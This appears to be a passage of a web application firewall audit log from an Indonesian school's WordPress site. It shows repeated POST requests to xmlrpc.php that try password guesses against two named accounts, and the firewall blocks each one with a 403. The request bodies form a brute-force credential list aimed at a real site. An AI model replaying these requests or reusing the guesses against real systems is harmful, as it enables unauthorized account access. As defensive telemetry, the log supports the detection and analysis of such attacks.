Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f95d1270-C-- wp.getUsersBlogs wakahumas 1234%^&* --f95d1270-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f95d1270-E-- --f95d1270-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865120267734 4324 (- - -) Stopwatch2: 1749865120267734 4324; combined=3350, p1=347, p2=2837, p3=0, p4=0, p5=98, sr=77, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f95d1270-Z-- --57458808-A-- [14/Jun/2025:08:39:30 +0700] aEzS0mmwZ6YUkjOdtI7C1gAAABU 103.236.140.4 33160 103.236.140.4 8181 --57458808-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --57458808-C-- wp.getUsersBlogs wakahumas 123456a --57458808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57458808-E-- --57458808-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865170033803 4202 (- - -) Stopwatch2: 1749865170033803 4202; combined=3267, p1=347, p2=2740, p3=0, p4=0, p5=103, sr=78, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57458808-Z-- --f73db228-A-- [14/Jun/2025:08:40:31 +0700] aEzTD2mwZ6YUkjOdtI7DDgAAAAQ 103.236.140.4 33272 103.236.140.4 8181 --f73db228-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f73db228-C-- wp.getUsersBlogs wakahumas butterfly --f73db228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f73db228-E-- --f73db228-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865231251645 5403 (- - -) Stopwatch2: 1749865231251645 5403; combined=3801, p1=464, p2=3147, p3=0, p4=0, p5=110, sr=85, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f73db228-Z-- --44575025-A-- [14/Jun/2025:08:41:31 +0700] aEzTS2mwZ6YUkjOdtI7DHAAAABg 103.236.140.4 33310 103.236.140.4 8181 --44575025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44575025-C-- wp.getUsersBlogs wakahumas robert --44575025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44575025-E-- --44575025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865291545375 4307 (- - -) Stopwatch2: 1749865291545375 4307; combined=3299, p1=353, p2=2703, p3=0, p4=0, p5=172, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44575025-Z-- --479a255a-A-- [14/Jun/2025:08:42:34 +0700] aEzTimIDXuKmWNi2UBS0pgAAAFg 103.236.140.4 33430 103.236.140.4 8181 --479a255a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --479a255a-C-- wp.getUsersBlogs wakahumas myheritage --479a255a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479a255a-E-- --479a255a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865354451454 5705 (- - -) Stopwatch2: 1749865354451454 5705; combined=4027, p1=482, p2=3375, p3=0, p4=0, p5=99, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479a255a-Z-- --5fed386a-A-- [14/Jun/2025:08:43:34 +0700] aEzTxkMWfhkd5Y0sFtrqUAAAAJY 103.236.140.4 33558 103.236.140.4 8181 --5fed386a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5fed386a-C-- wp.getUsersBlogs wakahumas jesus1 --5fed386a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fed386a-E-- --5fed386a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865414125269 6290 (- - -) Stopwatch2: 1749865414125269 6290; combined=4294, p1=543, p2=3519, p3=0, p4=0, p5=133, sr=102, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fed386a-Z-- --397b8e43-A-- [14/Jun/2025:08:44:42 +0700] aEzUCmmwZ6YUkjOdtI7DPAAAAAc 103.236.140.4 33702 103.236.140.4 8181 --397b8e43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --397b8e43-C-- wp.getUsersBlogs wakahumas scooby --397b8e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --397b8e43-E-- --397b8e43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865482883925 5280 (- - -) Stopwatch2: 1749865482883925 5280; combined=3751, p1=477, p2=3101, p3=0, p4=0, p5=101, sr=110, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --397b8e43-Z-- --9c8ee842-A-- [14/Jun/2025:08:45:47 +0700] aEzUS13g_boun6Rx5jLQyQAAAMk 103.236.140.4 33768 103.236.140.4 8181 --9c8ee842-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9c8ee842-C-- wp.getUsersBlogs wakahumas casper --9c8ee842-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c8ee842-E-- --9c8ee842-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865547031308 6226 (- - -) Stopwatch2: 1749865547031308 6226; combined=4220, p1=522, p2=3511, p3=0, p4=0, p5=110, sr=93, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c8ee842-Z-- --53a79113-A-- [14/Jun/2025:08:46:47 +0700] aEzUh0MWfhkd5Y0sFtrqgAAAAJY 103.236.140.4 33956 103.236.140.4 8181 --53a79113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --53a79113-C-- wp.getUsersBlogs wakasarpras 63a9f0ea7 --53a79113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a79113-E-- --53a79113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865607138727 4392 (- - -) Stopwatch2: 1749865607138727 4392; combined=3352, p1=367, p2=2815, p3=0, p4=0, p5=99, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a79113-Z-- --414ec625-A-- [14/Jun/2025:08:47:49 +0700] aEzUxWmwZ6YUkjOdtI7DZQAAAAE 103.236.140.4 34064 103.236.140.4 8181 --414ec625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --414ec625-C-- wp.getUsersBlogs wakasarpras wakasarpras@2018 --414ec625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --414ec625-E-- --414ec625-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865669162978 6153 (- - -) Stopwatch2: 1749865669162978 6153; combined=4306, p1=545, p2=3588, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --414ec625-Z-- --974fdb52-A-- [14/Jun/2025:08:48:52 +0700] aEzVBGmwZ6YUkjOdtI7DgwAAAAk 103.236.140.4 34240 103.236.140.4 8181 --974fdb52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --974fdb52-C-- wp.getUsersBlogs wakasarpras admin12345 --974fdb52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --974fdb52-E-- --974fdb52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865732552347 4658 (- - -) Stopwatch2: 1749865732552347 4658; combined=3444, p1=388, p2=2884, p3=0, p4=0, p5=101, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --974fdb52-Z-- --c07eb418-A-- [14/Jun/2025:08:49:54 +0700] aEzVQmIDXuKmWNi2UBS09gAAAEw 103.236.140.4 34428 103.236.140.4 8181 --c07eb418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 237 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c07eb418-C-- wp.getUsersBlogs wakasarpras smkn22-jkt.sch.id123 --c07eb418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c07eb418-E-- --c07eb418-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865794352080 5519 (- - -) Stopwatch2: 1749865794352080 5519; combined=4029, p1=486, p2=3291, p3=0, p4=0, p5=141, sr=97, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c07eb418-Z-- --7f360119-A-- [14/Jun/2025:08:50:57 +0700] aEzVgWIDXuKmWNi2UBS1CAAAAEQ 103.236.140.4 34496 103.236.140.4 8181 --7f360119-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7f360119-C-- wp.getUsersBlogs wakasarpras Superadmin --7f360119-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f360119-E-- --7f360119-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865857550866 5373 (- - -) Stopwatch2: 1749865857550866 5373; combined=3837, p1=472, p2=3192, p3=0, p4=0, p5=102, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f360119-Z-- --eb1a930f-A-- [14/Jun/2025:08:52:01 +0700] aEzVwUMWfhkd5Y0sFtrq7wAAAJM 103.236.140.4 34602 103.236.140.4 8181 --eb1a930f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eb1a930f-C-- wp.getUsersBlogs wakasarpras verystrong --eb1a930f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1a930f-E-- --eb1a930f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865921436497 4711 (- - -) Stopwatch2: 1749865921436497 4711; combined=3307, p1=405, p2=2743, p3=0, p4=0, p5=92, sr=83, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1a930f-Z-- --94953a62-A-- [14/Jun/2025:08:53:01 +0700] aEzV_WmwZ6YUkjOdtI7DwwAAAAU 103.236.140.4 34788 103.236.140.4 8181 --94953a62-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --94953a62-C-- wp.getUsersBlogs wakasarpras internet --94953a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94953a62-E-- --94953a62-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865981134141 3982 (- - -) Stopwatch2: 1749865981134141 3982; combined=3086, p1=343, p2=2578, p3=0, p4=0, p5=95, sr=75, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94953a62-Z-- --8d40af2c-A-- [14/Jun/2025:08:54:01 +0700] aEzWOV3g_boun6Rx5jLRNQAAANc 103.236.140.4 34890 103.236.140.4 8181 --8d40af2c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8d40af2c-C-- wp.getUsersBlogs wakasarpras public --8d40af2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d40af2c-E-- --8d40af2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749866041703508 5131 (- - -) Stopwatch2: 1749866041703508 5131; combined=3568, p1=475, p2=2954, p3=0, p4=0, p5=85, sr=93, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d40af2c-Z-- --8bbc102e-A-- 